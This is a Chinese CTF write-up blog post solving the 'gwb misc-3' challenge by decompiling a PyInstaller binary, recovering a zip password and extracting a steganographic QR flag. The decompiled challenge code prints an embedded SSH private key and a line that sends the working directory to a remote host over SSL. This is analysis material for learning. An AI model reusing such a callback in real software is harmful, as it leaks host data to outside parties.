gwb-misc-3

于 2021-12-07 16:13:19 发布
阅读量174 收藏
点赞数
分类专栏: ctf 笔记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/121770447
版权
笔记 同时被 2 个专栏收录
113 篇文章 5 订阅
订阅专栏
ctf
107 篇文章 4 订阅
订阅专栏

misc-3

感谢mochu大佬提供的wp,接下来开始复现。
解压压缩包有三个文件 .DS_Store cat.zip test
.DS_Store文件是用mac系统自动生成的隐藏文件,这个就不要管,
cat.zip需要密码才能解压,test的文件用记事本打开文件头部带有MZ
在这里插入图片描述
又是我没见过的东西,查了一下是window的PE文件标志,用来识别是否是PE文件 例如exe、dll、sys…,然后到这我就不会了,接下来是mochu大佬的思路。

在这里插入图片描述
确定test是python可执行文件,使用pyinstxtractor进行反编译。
python3 pyinstxtractor.py test
在这里插入图片描述
找到1.pyc用010Editor打开。
在这里插入图片描述
发现头部被替换修改成正常头部,进行反编译。
反编译网站:https://www.toolnb.com/tools/pyc.html
反编译过程会出现一点问题但是不影响解题,完成之后复制到编辑器删去多余的部分。
在这里插入图片描述

yyy = '--- BEGIN PRIVATE KEY ---\t\tb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW'
        yyy += '\t\tQyNTUxOQAAACCKvwHFw4alzEkncA+lDf3VeQ2ZNjX7gur4TzJFQlSgRwAAAJA8ULvmPFC7'
        yyy += '\t\t5gAAAAtzc2gtZWQyNTUxOQAAACCKvwHFw4alzEkncA+lDf3VeQ2ZNjX7gur4TzJFQlSgRw'
        yyy += '\t\tAAAEAMNUtG4HZ42kMsON1XY/y1lGyPns8JB6JYwi936VUuz4q/AcXDhqXMSSdwD6UN/dV5'
        yyy += '\t\tDZk2NfuC6vhPMkVCVKBHAAAACXJvb3RAa2FsaQECAwQ=\t\t--- END PRIVATE KEY ---'
        ssls.connect((domain, port))
        ssls.send(str.encode(str(os.getcwd()) + '<' + ''.join([yyy[_] for _ in xxx]) + '>' + ' > '))

关键部分是向ssl连接发送某些字符。

import os,base64
xxx = [358, 118, 30, 43, 127, 5, 282, 133, 56, 43, 116, 68, 68,
 147, 96, 13, 130, 4, 15, 35, 297, 57, 36, 83, 38, 93, 40, 147]

yyy = '--- BEGIN PRIVATE KEY ---\t\tb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW'
yyy += '\t\tQyNTUxOQAAACCKvwHFw4alzEkncA+lDf3VeQ2ZNjX7gur4TzJFQlSgRwAAAJA8ULvmPFC7'
yyy += '\t\t5gAAAAtzc2gtZWQyNTUxOQAAACCKvwHFw4alzEkncA+lDf3VeQ2ZNjX7gur4TzJFQlSgRw'
yyy += '\t\tAAAEAMNUtG4HZ42kMsON1XY/y1lGyPns8JB6JYwi936VUuz4q/AcXDhqXMSSdwD6UN/dV5'
yyy += '\t\tDZk2NfuC6vhPMkVCVKBHAAAACXJvb3RAa2FsaQECAwQ=\t\t--- END PRIVATE KEY ---'

print((str.encode(str(os.getcwd()) + '<' + ''.join([yyy[_] for _ in xxx]) + '>' + ' > ')))

a = """=4ld+EiemdFQQJWVfBTahUCMrgXJ"""
print(base64.b64decode(a[::-1]))
"""%x+0%!i0_UbP@Wfz!>v^"""

在这里插入图片描述
这个就是压缩的密码,解压之后把cat修改为cat.png,用stegsolve在blue plane 0 找到一张二维码,扫码得到flag
在这里插入图片描述
flag{Ju57_E4sy_2_93t_17}

[mzq]
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
夏令营集训3--MISC总结
MIGENGKING的博客
07-17 1960
MISC: 一 、流量分析 二、文件格式分析 三、隐写—图片、音频 四、压缩包分析 五、古典密码 什么是MISC: Misc 是英文 Miscellaneous 的前四个字母,杂项、混合体、大杂烩的意思。 Misc 在国外的比赛中其实又被具体划分为各个小块,有 Recon、Forensic、Stego、Misc… 在国内内的比赛中,被统一划分入 Misc 领域,有时 Crypto(尤其是古典密码)...
MISC-3
qdlws的博客
08-10 744
攻防世界部分MISC题目
MISC 3
qq_52431855的博客
12-20 226
Aesop_secret 知识点: AES 解密工具 在线链接http://www.jsons.cn/aesencrypt/ 动态图片分解 在线工具https://tu.sioe.cn/gj/fenjie/ 题目: 思路: 首先根据题目猜测要用到Aes解密。 打开附件后发现一个动态图接着便利用动态图片分解得到猜测其表达的是 ISCC ,这便是 Aes 解密所需要的密码。 接着把文件用记事本打开,发现了一串数据。 接着便尝试用 Aes 解密得到 于是,再解密一次终于成功得到...
2021赣网杯网络安全大赛_部分Writeup
Keepb1ue的博客
12-07 1万+
Web 1.checkin 这种游戏类题目,一般都是用js去做控制结果 直接查看网页源码点到http://118.31.60.233:10000/js/game.js Ctrl+F直接搜flag flag{134791e2-d93c-4d01-a71f-dcbe82d7fe08} 2.gwb-web-easypop <?php error_reporting(0); highlight_file(__FILE__); $pwd=getcwd(); class func { pu
DS_Store是什么?
热门推荐
余光的博客
10-08 2万+
一、遇见问题 参与到项目中时,git操作时,经常被提示你修改了 .DS_Store文件,这个文件我们并没有见过,他是什么呢? 二、 .DS_Store 是什么文件 .DS_Store(英文全称 Desktop Services Store)是一种由苹果公司的Mac OS X操作系统所创造的隐藏文件,目的在于存贮目录的自定义属性,例如文件们的图标位置或者是背景色的选择。 相当于 Windows 下...
gwb-misc-2
zip471642048的博客
12-07 370
misc-2 首先感谢Free师傅提供的思路,接下来是复现环节。 base32解码 解出一堆坐标,而且这个是二维数组,利用坐标点画图是16条直线。 接下来进行函数拟合求A和B,说人话就是16条直线是16个一元一次方程,我们就y=Ax+B的A和B就可以了。 参照这篇博客 https://zhuanlan.zhihu.com/p/144353126 A B 取整转成字符串就是flag了 import numpy as np import matplotlib.pyplot as plt from scip
gwb-misc-1
zip471642048的博客
12-06 171
decodemaster 打开docx刚开始还以为乱码,后面发现是wingdings 2字体,把字体切换成任意英文字体。 Vigenere密码 https://atomcated.github.io/Vigenere/ 经过尝试是base92+base58 工具网站:http://www.hiencode.com/
gwb-dc-inversions
04-06
gwb-dc-inversions 用于缅甸的无边界地球科学的1D和2D模拟和反演笔记本。 用法 在线的 您可以通过以下徽章通过mybinder在线运行这些笔记本: 本地的 步骤1:安装Anaconda 要在本地运行笔记本,您需要安装python,...
GSA-Grasshopper:GSA Grasshopper插件
04-06
GSA-蚱hopper GSA-Grasshopper是一个.NET组件库,使Grasshopper可以访问Oasys GSA文件,从而可以与... 将GSA-Grasshopper模型保存到.gwb 获取几何: 从模型获取几何对象(节点,Element1D,Element2D,Member1D,Me
tel-bot
03-20
使用GeeksWebBot(GWB)轻松为您的网站或博客创建bot。 描述 GeeksWeb Bot是 Telegram bot的的简化版和轻量级版本。它旨在易于在HeroKu云应用程序平台上启动。在此bot中,已删除Jadibot的数据库部分和其他复杂部分,...
区块链-py:区块链的python实现
01-31
python cli.py createblockchain --address 17Y288D5DnFwU6cj5M8YHnxYNnDhN6f5FK创建另一个钱包$ python cli.py createwalletYour new address: 15zBUPbr2B4JMcQHg6oJ8DYQi4t7RN1gWb发送硬币给某人$ python cli.py ...
2020GWB比赛项目.zip
09-30
【2020GWB比赛项目】是一个包含代码的压缩包,主要聚焦于比赛项目相关的开发工作。"Anabiosis-master"是压缩包中的主文件夹名,这通常表示这是一个Git仓库的主分支,可能包含了项目的源代码、文档和其他资源。 在...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8333
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
从0到场均50万GMV,鞋服品牌的视频号直播打法3. 直播场次报表.xlsx
07-13
从0到场均50万GMV,鞋服品牌的视频号直播打法3. 直播场次报表.xlsx
Java语言基础入门教程 Java开发编程基础课程 第6章 字符串 共30页.pptx
07-13
【课程大纲】 第1、2、3章 Java简介 共15页.pptx 第4章 流程控制 共14页.pptx 第5章 数组 共8页.pptx 第6章 字符串 共30页.pptx 第7章 定义类 共10页.pptx 第8章 内部类和异常处理 共18页.pptx 第8章 生成对象 共18页.pptx 第9章 类的高级特性 共12页.pptx 第9章 深度了解变量和方法 共13页.pptx 第10章 理解包 共18页.pptx 第11章 继承、多态和接口 共21页.pptx 第12章 内部类和异常处理 共18页.pptx 第13章 图形用户界面 共31页.pptx 第14章 线程 共22页.pptx
大学生创业计划书(26)三篇文件.docx
07-14
大学生创业计划书(26)三篇文件.docx
mipi-UniPro-specification-v2-0 pdf
最新发布
07-14
mipi_UniPro_specification_v2-0 协议
IMC面试葵花宝典.docx
07-13
呼叫建立流程(白话版) 1.首先主叫 UE 附着至 eNB 2.建立 RRC 连接 3.主叫发起服务请求,建立 ERAB 承载(QCI5) 4.在主叫用户的默认承载完全建立后,主叫发起 SIP 呼叫(首先是 Register 信令),PGW 与 PCC 通过 DPI 检测出业务流中含高优先级的语音业务(因为数据流中含 SIP 协议)。则发起专用承载建立过程。 5.专用承载建立成功,PGW 与 UE 之间将这路 SDF 转移到这个专用承载上。 6.PGW 将带 SIP 呼叫的 IP 发出去,这个业务流会被转给 IMS 网络,然后就是 IMS 的注册流程,之间有四条 SIP 信令(主叫与 IMS 核心网之间),在主叫侧 EPS 网络中是在专用承载上传递的。 7.主叫用户呼被叫,用 SIP invite,这个信令在主叫侧 EPS 中也是在专用承载上传递的。IMS 网络会把呼叫信令路由到被叫侧 EPS 网络,即寻呼被叫使被叫 UE 与 PGW 之间建立专用承载(PGW 也有 DPI 检测的过程), 8.在被叫侧专用承载建立完成后,SIP 呼叫信令在主叫侧、IMS 核心网、被叫侧
android 广播的代码
03-21
Android 广播的代码可以分为两部分:发送广播和接收广播。 发送广播的代码: ```java Intent intent = new Intent(); intent.setAction("com.example.broadcast.MY_BROADCAST"); intent.putExtra("message", "Hello, world!"); sendBroadcast(intent); ``` 接收广播的代码: ```java public class MyBroadcastReceiver extends BroadcastReceiver { @Override public void onReceive(Context context, Intent intent) { String action = intent.getAction(); if ("com.example.broadcast.MY_BROADCAST".equals(action)) { String message = intent.getStringExtra("message"); Log.d("MyBroadcastReceiver", "Received message: " + message); } } } ``` 需要在 AndroidManifest.xml 中注册广播接收器: ```xml <receiver android:name=".MyBroadcastReceiver"> <intent-filter> <action android:name="com.example.broadcast.MY_BROADCAST" /> </intent-filter> </receiver> ``` 这样,当发送广播时,MyBroadcastReceiver 的 onReceive 方法就会被调用,可以在其中处理接收到的广播消息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值